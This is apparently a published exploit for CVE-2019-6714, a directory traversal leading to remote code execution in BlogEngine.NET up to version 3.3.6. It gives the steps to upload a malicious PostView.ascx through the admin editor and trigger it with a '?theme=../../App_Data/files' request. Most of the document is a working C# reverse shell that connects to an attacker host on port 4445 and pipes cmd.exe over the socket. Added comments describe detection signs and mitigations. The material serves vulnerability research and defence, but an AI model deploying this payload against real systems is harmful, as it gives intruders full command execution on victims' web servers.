# Exploit Title: BlogEngine.NET <= 3.3.6 Directory Traversal RCE
# Date: 02-11-2019
# Exploit Author: Dustin Cobb
# Vendor Homepage: https://github.com/rxtur/BlogEngine.NET/
# Software Link: https://github.com/rxtur/BlogEngine.NET/releases/download/v3.3.6.0/3360.zip
# Version: <= 3.3.6
# Tested on: Windows 2016 Standard / IIS 10.0
# CVE : CVE-2019-6714
/*
* CVE-2019-6714
*
* Path traversal vulnerability leading to remote code execution. This
* vulnerability affects BlogEngine.NET versions 3.3.6 and below. This
* is caused by an unchecked "theme" parameter that is used to override
* the default theme for rendering blog pages. The vulnerable code can
* be seen in this file:
*
* /Custom/Controls/PostList.ascx.cs
*
* Attack:
*
* First, we set the TcpClient address and port within the method below to
* our attack host, who has a reverse tcp listener waiting for a connection.
* Next, we upload this file through the file manager. In the current (3.3.6)
* version of BlogEngine, this is done by editing a post and clicking on the
* icon that looks like an open file in the toolbar. Note that this file must
* be uploaded as PostView.ascx. Once uploaded, the file will be in the
* /App_Data/files directory off of the document root. The admin page that
* allows upload is:
*
* http://10.10.10.10/admin/app/editor/editpost.cshtml
*
*
* Finally, the vulnerability is triggered by accessing the base URL for the
* blog with a theme override specified like so:
*
* http://10.10.10.10/?theme=../../App_Data/files
*
*/
<%@ Control Language="C#" AutoEventWireup="true" EnableViewState="false" Inherits="BlogEngine.Core.Web.Controls.PostViewBase" %>
<%@ Import Namespace="BlogEngine.Core" %>
<script runat="server">
// Writer side of the outbound socket. It is assigned in OnLoad and kept in
// a static field so the static stdout callback (CmdOutputDataHandler) can
// write to the same connection; it is never disposed by this file.
static System.IO.StreamWriter streamWriter;
// Page-lifecycle hook: everything below runs on the first request that
// renders this control, i.e. the payload fires as soon as the blog page is
// served with this file resolved as its theme view.
//
// Defender context (all from the header of this file): the control is only
// reachable because the "theme" query parameter in
// /Custom/Controls/PostList.ascx.cs is not validated, so a request can point
// theme resolution at the user-writable upload directory /App_Data/files.
// Placing the file there requires access to the admin editor, so the full
// chain is "authenticated upload + path traversal". Affected range per the
// header is 3.3.6 and below; beyond upgrading, a theme path should never be
// allowed to resolve outside the themes directory, and the upload directory
// should not be executable as server-side markup.
protected override void OnLoad(EventArgs e) {
    base.OnLoad(e);

    // Outbound TCP connection from the web server's worker process to a
    // hard-coded address/port (placeholder values in this PoC). Detection
    // signature: the IIS worker process (w3wp.exe on the "Tested on"
    // platform) opening an egress connection to an arbitrary port and then
    // spawning cmd.exe as a child, both from within a request.
    using(System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("10.10.10.20", 4445)) {
        using(System.IO.Stream stream = client.GetStream()) {
            // Reader side of the socket; the writer goes into the static
            // field so the output callback can reach it.
            using(System.IO.StreamReader rdr = new System.IO.StreamReader(stream)) {
                streamWriter = new System.IO.StreamWriter(stream);

                StringBuilder strInput = new StringBuilder();

                // cmd.exe is started in-process with stdin/stdout/stderr
                // redirected; stdout lines are delivered asynchronously to
                // CmdOutputDataHandler, which relays them over the socket.
                System.Diagnostics.Process p = new System.Diagnostics.Process();
                p.StartInfo.FileName = "cmd.exe";
                p.StartInfo.CreateNoWindow = true;
                p.StartInfo.UseShellExecute = false;
                p.StartInfo.RedirectStandardOutput = true;
                p.StartInfo.RedirectStandardInput = true;
                p.StartInfo.RedirectStandardError = true;
                p.OutputDataReceived += new System.Diagnostics.DataReceivedEventHandler(CmdOutputDataHandler);
                p.Start();
                p.BeginOutputReadLine();

                // Blocks the request thread forever: each line read from the
                // socket is written to cmd.exe's stdin. The HTTP request that
                // triggered OnLoad therefore never completes; presumably it
                // shows up as a long-running request for "/?theme=..." in IIS
                // request monitoring — verify on the target platform.
                while(true) {
                    strInput.Append(rdr.ReadLine());
                    p.StandardInput.WriteLine(strInput);
                    strInput.Remove(0, strInput.Length);
                }
            }
        }
    }
}
// Stdout callback for the cmd.exe child started in OnLoad: relays each
// output line over the socket held in the static streamWriter. Because the
// catch below swallows every exception, a closed or unreachable remote end
// produces no error, no log entry and no change in the worker process —
// the only observable artifacts are the network connection and the child
// process themselves.
private static void CmdOutputDataHandler(object sendingProcess, System.Diagnostics.DataReceivedEventArgs outLine) {
    StringBuilder strOutput = new StringBuilder();

    // Empty lines and the null delivered when the child's stdout closes are
    // dropped rather than forwarded.
    if (!String.IsNullOrEmpty(outLine.Data)) {
        try {
            strOutput.Append(outLine.Data);
            streamWriter.WriteLine(strOutput);
            streamWriter.Flush();
        } catch (Exception err) { }   // every failure is silently discarded
    }
}
</script>
<asp:PlaceHolder ID="phContent" runat="server" EnableViewState="false"></asp:PlaceHolder>